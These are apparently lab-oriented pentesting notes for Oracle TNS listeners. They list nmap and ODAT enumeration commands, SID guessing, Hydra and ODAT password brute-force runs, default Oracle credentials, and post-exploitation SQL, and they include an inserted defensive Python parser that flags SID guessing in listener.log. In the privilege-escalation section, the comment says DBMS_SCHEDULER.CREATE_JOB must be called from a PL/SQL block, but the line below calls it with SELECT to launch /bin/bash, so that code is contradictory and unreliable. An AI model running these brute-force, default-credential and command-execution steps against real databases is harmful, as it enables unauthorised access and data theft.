Oracle TNS Pentesting Notes
Protocol Overview
Basic Information
Port: TCP 1521 (default)
Protocol Type: Application layer
Purpose: Database communication protocol for Oracle
Security: Supports encryption, access controls, and authentication
Protocol Features
Network Protocols
TCP/IP
UDP
IPX/SPX
AppleTalk
Security Features
SSL/TLS encryption
IPv6 support
Access control lists
PL/SQL restrictions
Initial Enumeration
Port Scanning
# Basic Nmap scan
nmap -p1521 -sV <target>
# Aggressive scan with scripts
nmap -p1521 -sV -sC -A <target>
# All Oracle scripts
nmap -p1521 --script oracle-* <target>
Banner Grabbing
# Using TNSPing
tnsping <target>
# Using Nmap (reports the listener's TNS version)
nmap -p1521 -sV --script oracle-tns-version <target>
# Using ODAT (tnscmd module, VERSION command against the listener)
./odat.py tnscmd -s <target> -p 1521 --version
Anonymous/Default Access
Testing Default SIDs
# Using ODAT
./odat.py sidguesser -s <target> -p 1521
# Using Nmap
nmap -p1521 --script oracle-sid-brute <target>
# Manual connection
sqlplus scott/tiger@<target>:1521/ORCL
Common Default SIDs
ORCL
XE
PROD
DEV
TEST
Brute Force Attacks
Using ODAT
# Password guessing
./odat.py passwordguesser -s <target> -p 1521 -d XE
# Dictionary attack
./odat.py passwordguesser -s <target> -p 1521 -d XE --accounts-file accounts.txt
# Run every ODAT module (SID guessing, then password guessing on each SID found)
./odat.py all -s <target> -p 1521
Using Hydra
# Listener password (oracle-listener module)
hydra -L users.txt -P passwords.txt oracle-listener://<target>
# Target specific SID
hydra -L users.txt -P passwords.txt oracle-sid://<target>/ORCL
Tool Installation
# Install ODAT and dependencies
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
# Install Oracle Instant Client
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
# Set environment (absolute paths so the client still resolves after changing directory)
export LD_LIBRARY_PATH=$PWD/instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$PWD/instantclient_21_12:$PATH
# Install Python dependencies
pip3 install cx_Oracle
pip3 install colorlog termcolor passlib python-libnmap pycryptodome
Common NSE Scripts
# SID enumeration
nmap -p1521 --script oracle-sid-brute <target>
# TNS version
nmap -p1521 --script oracle-tns-version <target>
# Brute force
nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=ORCL <target>
# Enumerate users
nmap -p1521 --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL <target>
Configuration Files
Server-side Files
# Listener configuration
$ORACLE_HOME/network/admin/listener.ora
# Security configuration
$ORACLE_HOME/network/admin/sqlnet.ora
# Access control
$ORACLE_HOME/network/admin/protocol.ora
Client-side Files
# Connection configuration
$ORACLE_HOME/network/admin/tnsnames.ora
# SQL*Net configuration
$ORACLE_HOME/network/admin/sqlnet.ora
Example Configurations
listener.ora
LISTENER =
(DESCRIPTION_LIST =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))
(ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
)
)
tnsnames.ora
ORCL =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
)
(CONNECT_DATA =
(SERVER = DEDICATED)
(SERVICE_NAME = orcl)
)
)
Common Vulnerabilities
Default Credentials:
SYSTEM/MANAGER
SYS/CHANGE_ON_INSTALL
SCOTT/TIGER
Configuration Issues:
Weak passwords
Default SIDs
Unpatched vulnerabilities
Exposed listeners
Known Attack Vectors:
TNS Poison
Password brute force
SID enumeration
PL/SQL injection
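The tnsnames.ora and listener.ora excerpts above, and the connection lines the listener writes to listener.log, all use the same Oracle Net "(KEY=VALUE)" grammar. The following added example (not part of the original notes and not code from any Oracle tool) parses that grammar once and uses it for two jobs: pulling the TCP endpoints and service name out of a tnsnames.ora entry, and spotting the SID enumeration listed above from the defender's side, by counting per-source connection attempts the listener refused with TNS-12505/12514. The tnsnames.ora excerpt and listener.log lines are constructed samples; the listener.log line layout assumed here is the standard `<date> <time> * <CONNECT_DATA> * <ADDRESS> * establish * <sid> * <return code>` form.

```python
"""Oracle Net descriptor parser: tnsnames.ora endpoints and SID-guessing detection.

Added example, not from the original notes or any Oracle tool. tnsnames.ora,
listener.ora and the connection lines of listener.log all use the same
"(KEY=VALUE)" grammar, so one parser serves both jobs. All sample data below is
constructed.
"""
import re

TOKEN_RE = re.compile(r'\s*(\(|\)|=|[^()=\s]+)')
# listener.log connection line (assumed standard layout):
# <date> <time> * <CONNECT_DATA> * <ADDRESS> * establish * <sid> * <return code>
LOG_LINE_RE = re.compile(
    r'^\S+ \S+ \* (?P<connect>\(.*?\)) \* (?P<address>\(.*?\)) \* establish \* (?P<sid>\S+) \* (?P<rc>\d+)$')
REFUSED = {12505, 12514}  # TNS-12505: unknown SID, TNS-12514: unknown SERVICE_NAME

SAMPLE_TNSNAMES = """
# constructed tnsnames.ora excerpt
ORCL =
  (DESCRIPTION =
    (ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521)))
    (CONNECT_DATA = (SERVER = DEDICATED)(SERVICE_NAME = orcl))
  )
"""

# Constructed listener.log: one legitimate client, one source cycling through default SIDs.
SAMPLE_LISTENER_LOG = """\
03-JAN-2024 09:00:01 * (CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.129.11.50)(PORT=40122)) * establish * orcl * 0
03-JAN-2024 09:00:05 * (CONNECT_DATA=(SID=XE)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=51001)) * establish * XE * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
03-JAN-2024 09:00:05 * (CONNECT_DATA=(SID=PROD)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=51002)) * establish * PROD * 12505
03-JAN-2024 09:00:06 * (CONNECT_DATA=(SID=DEV)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=51003)) * establish * DEV * 12505
03-JAN-2024 09:00:06 * (CONNECT_DATA=(SID=TEST)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=51004)) * establish * TEST * 12505
03-JAN-2024 09:00:07 * (CONNECT_DATA=(SID=ORCL)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=51005)) * establish * ORCL * 0
"""


def tokenize(text):
    """Split descriptor text into '(', ')', '=' and bare-value tokens."""
    text, pos, tokens = text.strip(), 0, []
    while pos < len(text):
        m = TOKEN_RE.match(text, pos)
        if not m:
            raise ValueError(f"unexpected character at offset {pos}")
        tokens.append(m.group(1))
        pos = m.end()
    return tokens


def parse_group(tokens, i):
    """Parse '(' KEY '=' VALUE ')' at tokens[i]; VALUE is a scalar or nested groups."""
    if tokens[i] != '(' or tokens[i + 2] != '=':
        raise ValueError(f"expected '(KEY=' at token {i}")
    key, i = tokens[i + 1], i + 3
    if tokens[i] == '(':              # value is a sequence of nested groups
        value = []
        while tokens[i] == '(':
            pair, i = parse_group(tokens, i)
            value.append(pair)
    else:                             # bare scalar value
        value, i = tokens[i], i + 1
    if tokens[i] != ')':
        raise ValueError(f"expected ')' at token {i}")
    return (key, value), i + 1


def parse_descriptor(text):
    """Parse one stand-alone '(KEY=...)' descriptor into a (key, value) pair."""
    tokens = tokenize(text)
    pair, end = parse_group(tokens, 0)
    if end != len(tokens):
        raise ValueError("trailing data after descriptor")
    return pair


def parse_net_file(text):
    """Parse the 'NAME = (DESCRIPTOR)' entries of a tnsnames.ora / listener.ora file."""
    tokens = tokenize(re.sub(r'#.*', '', text))   # '#' starts a comment
    entries, i = {}, 0
    while i < len(tokens):
        name = tokens[i]
        if tokens[i + 1] != '=':
            raise ValueError(f"expected '=' after {name}")
        pair, i = parse_group(tokens, i + 2)
        entries[name] = [pair]
    return entries


def find(pairs, key):
    """Recursively collect every value (scalar or nested list) stored under KEY."""
    hits = []
    for k, v in pairs:
        if k.upper() == key.upper():
            hits.append(v)
        if isinstance(v, list):
            hits.extend(find(v, key))
    return hits


def tcp_endpoints(pairs):
    """(host, port) for each TCP ADDRESS group, in the order a client would try them."""
    return [(find(a, 'HOST')[0], int(find(a, 'PORT')[0]))
            for a in find(pairs, 'ADDRESS')
            if isinstance(a, list) and find(a, 'PROTOCOL')[0].upper() == 'TCP']


def detect_sid_guessing(log_text, min_attempts=3):
    """Sources refused with TNS-12505/12514 at least min_attempts times.
    Returns {source_host: sorted distinct SID/service names it tried}."""
    refused = {}
    for line in log_text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m or int(m.group('rc')) not in REFUSED:
            continue
        # Take the source from the listener-recorded ADDRESS, not from the
        # client-supplied CID inside CONNECT_DATA, which the client controls.
        host = find([parse_descriptor(m.group('address'))], 'HOST')[0]
        refused.setdefault(host, []).append(m.group('sid'))
    return {h: sorted(set(s)) for h, s in refused.items() if len(s) >= min_attempts}


if __name__ == '__main__':
    entries = parse_net_file(SAMPLE_TNSNAMES)
    for name, pairs in entries.items():
        print(name, tcp_endpoints(pairs), find(pairs, 'SERVICE_NAME'))
    print(detect_sid_guessing(SAMPLE_LISTENER_LOG))
```

The detection keys on the listener's own ADDRESS record rather than the HOST inside CID, because CONNECT_DATA is sent by the client and can say anything. A burst of distinct SIDs from one source, each ending in 12505, is exactly what the sidguesser and oracle-sid-brute runs above leave behind; the same loop over a real listener.log gives a first triage list before touching the database audit trail.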
Post Exploitation
Information Gathering
-- Check current user privileges
SELECT * FROM user_role_privs;
-- List all users
SELECT * FROM all_users;
-- View database version
SELECT * FROM v$version;
-- Show the database the session is connected to (name, DBID, log mode)
SELECT * FROM v$database;
Privilege Escalation
-- Check for DBA role
SELECT * FROM user_role_privs WHERE granted_role='DBA';
-- Execute system commands (if allowed): DBMS_SCHEDULER.CREATE_JOB is a procedure, so it is
-- invoked from a PL/SQL block rather than SELECT, and requires the CREATE JOB privilege
SELECT DBMS_SCHEDULER.create_job('CMD','EXECUTABLE','/bin/bash');
-- Check for accessible PL/SQL procedures
SELECT * FROM all_procedures WHERE owner='SYS';
Common Response Codes
ORA-01017
Invalid username/password
ORA-12541
No listener
ORA-12505
SID not found
ORA-28000
Account locked
ORA-01031
Insufficient privileges
Best Practices for Pentesting
Initial Reconnaissance:
Identify TNS version
Enumerate SIDs
Check for default credentials
Test listener status
Deep Enumeration:
Map database structure
List available schemas
Check user privileges
Identify sensitive data
Documentation:
Record found SIDs
Note vulnerable configurations
Document credentials
Save SQL query results
Risk Assessment:
Evaluate data sensitivity
Assess privilege levels
Consider business impact
Prioritize findings
Common Tools Summary
Enumeration:
ODAT
TNSPing
Nmap NSE scripts
SQLplus
Exploitation:
ODAT modules
Metasploit
Custom SQL queries
SQLplus
Post-Exploitation:
SQLplus
ODAT
Custom PL/SQL scripts
Database administration tools